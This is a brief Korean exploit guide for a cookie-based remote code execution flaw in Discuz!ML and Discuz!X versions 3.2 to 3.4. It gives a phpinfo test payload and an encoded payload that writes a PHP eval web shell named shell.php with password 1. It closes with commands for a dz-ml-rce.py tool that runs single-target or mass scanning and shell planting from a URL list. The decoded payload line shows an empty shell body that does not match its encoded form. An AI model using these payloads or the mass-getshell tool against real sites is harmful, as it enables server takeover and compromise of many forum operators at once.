
영향받는 시스템 및 버전: Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4
영향을 받는 시스템 및 버전: Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 취약점 원인: Discuz!ML 시스템이 cookie의 l로 전달되는 language 매개변수 내용을 필터링하지 않아 문자열 연결이 발생하고, 이를 통해 PHP 코드가 실행됩니다.
cookie 필드에 xxxx_xxxx_language 필드가 나타납니다. 근본 원인은 바로 이 필드에 인젝션이 존재하여 발생하는 RCE입니다.
패킷을 캡처하여 cookie의 language 값을 다음과 같이 수정합니다.
xxxx_xxxx_language=sc'.phpinfo().'
getshell
%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27 실제 값:
'.+file_put_contents('shell.php',urldecode('')).'
이렇게 하면 경로에 shell.php가 생성되며, 연결 비밀번호는 1입니다.
============================================================================================================================================================== 취약점 존재 여부 확인
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php"
cmdshell 모드
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell
getshell 모드
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell
대량 탐지
python dz-ml-rce.py -f urls.txt
대량 getshell
python dz-ml-rce.py -f urls.txt --getshell